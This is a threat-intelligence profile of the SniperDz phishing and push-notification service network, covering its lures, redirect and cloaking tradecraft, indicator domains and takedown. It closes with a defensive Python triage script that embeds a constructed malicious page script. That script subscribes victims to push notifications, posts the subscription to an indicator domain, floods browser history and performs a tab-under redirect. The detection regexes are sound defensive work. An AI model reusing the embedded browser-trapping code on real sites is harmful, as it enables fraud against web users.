SniperDz
SniperDz is a long-running phishing-as-a-service (PhaaS) and push-notification-as-a-service (PNaaS) affiliate ecosystem identified by Group-IB and later dismantled in a joint operation by Group-IB, INTERPOL, and the Algerian National Police. According to Group-IB's reporting, the network launched in 2015, operated for nearly ten years, and changed names repeatedly to evade detection; known aliases are JokerDz, StormDz, and SpamDz.

The platform provided centralized, turnkey phishing infrastructure together with ready-made phishing templates. Figures differ between reports: one cites roughly 80 templates, including multilingual ones, targeting around 30 major online platforms such as PayPal, Facebook, Instagram, Netflix, and Steam; Group-IB also reported more than 50 templates impersonating over 70 globally recognized brands across financial services, social media, streaming, and gaming. More than 20,000 domains hosted fake login pages, letting even low-skill affiliates harvest usernames, passwords, and other personal data at scale.

Activity was concentrated in the Middle East and North Africa. Campaigns used fraudulent Facebook and Instagram accounts impersonating politicians, public figures, and telecom providers, including Algérie Télécom, to lure victims with fake offers such as free mobile internet packages, gifts, financial compensation, and government subsidy programs. Victims were routed through trusted link-aggregation services such as Linkbio and Linktree, then through attacker-controlled redirect and tracking infrastructure.

The ecosystem also operated as a browser push-notification monetization platform. Victims were shown pages prompting them to click "Allow" to continue; once they did, the infrastructure registered a browser push subscription using a VAPID public key that recurred across samples.
Subscription tokens and metadata were sent back to operator-controlled servers, and victims were then monetized through unsolicited advertisements, scam promotions, and malicious content delivered as browser push notifications, which keep arriving after the original page is closed. Techniques described in the reporting include multi-stage redirect chains, cloaking that serves benign error pages to researchers and scanners, browser history manipulation that inserts fake entries so the Back button returns the victim to the attacker's page (a back-button prison), and tab-under redirection. Infrastructure cited in the reporting includes shared hosting on Horizon IS and the domains win.feezossl[.]xyz, win.anababayala[.]com, aff.bnaoswhye[.]shop, and raviral[.]com.

Reporting attributes development of the platform to an online actor known as Guedz. Group-IB and INTERPOL reportedly identified Guedz through tutorial videos that exposed an administrator panel and backend email addresses; Algerian authorities subsequently arrested him and seized hardware containing phishing code and malicious scripts. The takedown was conducted as part of INTERPOL's Operation Ramz.
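The following triage script is an added example, not code from Group-IB, INTERPOL, or the SniperDz operators. It refangs the indicator domains quoted above and matches them against proxy-log lines, then scans captured page JavaScript for the behaviours the reporting describes: the "Allow" push prompt, a push subscription with a hard-coded VAPID key, history.pushState flooding (the back-button prison), and a tab-under redirect. The log lines, the captured script, the log format, and the VAPID key are constructed for the demo; the real recurring key is not reproduced on this page.

```python
"""Triage helper for SniperDz-style tradecraft (added example; constructed inputs)."""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Indicator domains as printed (defanged) in the reporting above.
DEFANGED_IOCS = ["win.feezossl[.]xyz", "win.anababayala[.]com",
                 "aff.bnaoswhye[.]shop", "raviral[.]com"]


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


IOC_DOMAINS = {refang(d) for d in DEFANGED_IOCS}


def match_ioc(host: str):
    """Return the IOC that host equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


# Constructed proxy-log format: timestamp client method url status
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")

SAMPLE_LOG = [  # constructed, not observed traffic
    "2024-03-01T10:00:01Z 10.0.0.12 GET https://www.example.com/ 200",
    "2024-03-01T10:00:04Z 10.0.0.12 GET https://win.feezossl.xyz/?click=abc 302",
    "2024-03-01T10:00:05Z 10.0.0.12 GET https://cdn.raviral.com/push.js 200",
    "2024-03-01T10:00:09Z 10.0.0.37 POST https://aff.bnaoswhye.shop/subscribe 200",
    "malformed line that should be skipped",
]


def scan_proxy_log(lines):
    """Return (client, host, matched_ioc) for every well-formed line hitting an IOC."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        host = urlsplit(m["url"]).hostname or ""
        ioc = match_ioc(host)
        if ioc:
            hits.append((m["client"], host, ioc))
    return hits


def looks_like_vapid_key(key: str) -> bool:
    """A VAPID public key is an uncompressed P-256 point: 65 bytes starting with
    0x04, shipped as unpadded base64url (87 characters)."""
    try:
        raw = base64.urlsafe_b64decode(key + "=" * (-len(key) % 4))
    except (ValueError, binascii.Error):
        return False
    return len(raw) == 65 and raw[0] == 0x04


JS_SIGNATURES = {
    "notification_prompt": re.compile(r"Notification\.requestPermission\s*\("),
    "push_subscribe": re.compile(r"pushManager\.subscribe\s*\("),
    # pushState inside a loop: the back-button prison the reporting describes
    "history_flood": re.compile(r"for\s*\([^)]*\)\s*\{[^}]*history\.pushState\s*\("),
    # window.open followed shortly by navigating the original tab away
    "tab_under": re.compile(r"window\.open\s*\([^)]*\)[\s\S]{0,200}?location(?:\.href\s*=|\.replace\s*\()"),
}
VAPID_RE = re.compile(r"applicationServerKey\s*:[^'\"]*['\"]([A-Za-z0-9_-]{80,90})['\"]")
URL_RE = re.compile(r"https?://[^\s'\"()]+")

# Placeholder key (constructed): 87 base64url chars decoding to 65 bytes with a 0x04 prefix.
DEMO_VAPID_KEY = "B" + "AbCdEfGhIjKlMnOpQrStUvWxYz0123456789-_" * 2 + "AbCdEfGhIj"

CAPTURED_SCRIPT = f"""
document.getElementById('allow').onclick = function () {{
  Notification.requestPermission().then(function (p) {{
    if (p !== 'granted') return;
    navigator.serviceWorker.ready.then(function (reg) {{
      return reg.pushManager.subscribe({{
        userVisibleOnly: true,
        applicationServerKey: urlBase64ToUint8Array('{DEMO_VAPID_KEY}')
      }});
    }}).then(function (sub) {{
      fetch('https://win.feezossl.xyz/sub', {{method: 'POST', body: JSON.stringify(sub)}});
    }});
  }});
}};
for (var i = 0; i < 50; i++) {{ history.pushState({{}}, '', location.href + '#' + i); }}
window.open(location.href, '_blank');
location.href = 'https://aff.bnaoswhye.shop/go?x=1';
"""


def scan_page_script(js: str) -> dict:
    """Flag the behaviours present in a captured script, the VAPID key it embeds,
    and any IOC hosts it contacts."""
    result = {name: bool(rx.search(js)) for name, rx in JS_SIGNATURES.items()}
    m = VAPID_RE.search(js)
    key = m.group(1) if m else None
    result["vapid_key"] = key if key and looks_like_vapid_key(key) else None
    hosts = set()
    for url in URL_RE.findall(js):
        host = urlsplit(url).hostname
        if host and match_ioc(host):
            hosts.add(host)
    result["ioc_hosts"] = sorted(hosts)
    return result


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print("proxy hit:", hit)
    print("script findings:", scan_page_script(CAPTURED_SCRIPT))
```

The VAPID check matters in practice: a recurring key is the one indicator that survives domain rotation, so a key extracted from one landing page can be searched across crawler captures and service-worker registrations rather than relying on the 20,000-plus domains alone. The regex signatures are deliberately loose; treat them as pivot points for analyst review, not as standalone block rules.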
Targeting
Sourced from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Banks
- Software & Services
- Media & Entertainment
Tradecraft
7 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic.
Recent activity
2 sources tracked across advisories, community write-ups, and news.
Operates as a centralized PhaaS/PNaaS affiliate ecosystem enabling large-scale phishing and online fraud campaigns, including impersonation scams, browser notification abuse, and monetization through malicious redirects and push subscriptions.
A long-running phishing-as-a-service network operating via Telegram and Facebook channels, offering free ready-made phishing templates and infrastructure to affiliates to create fake login pages and steal credentials and personal data across many popular platforms.